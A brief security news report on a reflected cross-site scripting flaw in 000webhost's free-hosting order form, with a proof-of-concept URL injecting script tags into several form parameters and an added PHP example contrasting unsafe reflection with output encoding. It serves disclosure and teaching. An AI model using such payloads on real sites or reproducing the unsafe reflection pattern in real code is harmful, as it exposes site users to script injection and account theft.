000webhost Vulnerable to Non-Persistent Cross Site Scripting


One of the top free web hosting providers, 000WebHost, has been found vulnerable to cross-site scripting (XSS) on its website. The vulnerability was discovered by cyber security researcher Vedachala.

The domain name, subdomain name and email address fields on the "Order Free Web Hosting" page of the site (000webhost.com) are vulnerable to XSS injection. The web application fails to validate these inputs for special characters, which results in this security flaw.
 

POC code for this security bug:

    http://www.000webhost.com/order.php?domain=\"><script>alert(/e hacking news/)</script>&subdomain=\"><script>alert(/e hacking news/)</scrip&name=\"><script>alert(/E Hacking News/)</script>&email=\"><script>alert(/e hacking news/)</script>&pass1=\"><script>alert(/E Hacking New&pass2=\"><script>alert(/E Hacking New&aggree=yes&error_multiple=1&error_domain=1&error_subdomain=1&error_name=&error_email=1&error_pass=4&error_tos=&error_number=&error_js=&error_disposable=&error_bad_gmail=
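
The missing input handling described above, as an added example that is not 000webhost's code or part of the original article: a hypothetical PHP handler that reflects the `domain` and `email` parameters into form fields, with the unsafe rendering beside an output-encoded one and a validation check. The function names, markup and sample request are assumptions.

```php
<?php
// Added example, not 000webhost's code: a hypothetical order form that
// echoes query parameters back into value="" attributes.

// Vulnerable pattern: the raw request value lands inside the attribute,
// so a double quote in the value ends the attribute early.
function render_field_unsafe(string $field, array $query): string
{
    $value = $query[$field] ?? '';
    return '<input name="' . $field . '" value="' . $value . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
function render_field_safe(string $field, array $query): string
{
    $value = $query[$field] ?? '';
    if (!is_string($value)) {          // ?domain[]=x arrives as an array
        $value = '';
    }
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input name="' . $field . '" value="' . $encoded . '">';
}

// Second layer: validate the fields and report which ones failed.
function invalid_fields(array $query): array
{
    $bad = [];
    $domain = $query['domain'] ?? '';
    $host = '/^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$/i';
    if (!is_string($domain) || !preg_match($host, $domain)) {
        $bad[] = 'domain';
    }
    $email = $query['email'] ?? '';
    if (!is_string($email) || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $bad[] = 'email';
    }
    return $bad;
}

// Constructed request mirroring the parameter names in the PoC URL above.
$query = [
    'domain' => '"><script>alert(/e hacking news/)</script>',
    'email'  => 'user@example.com',
];

echo render_field_unsafe('domain', $query), "\n"; // value closes the attribute
echo render_field_safe('domain', $query), "\n";   // value stays inside it
print_r(invalid_fields($query));                  // fields that failed validation
```

Encoding at output is the fix for the reflection itself; the validation step only narrows what the form accepts and should not be relied on alone.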

The researcher also recently found a reflected XSS vulnerability in the Airtel website.


Source: http://thehackernews.com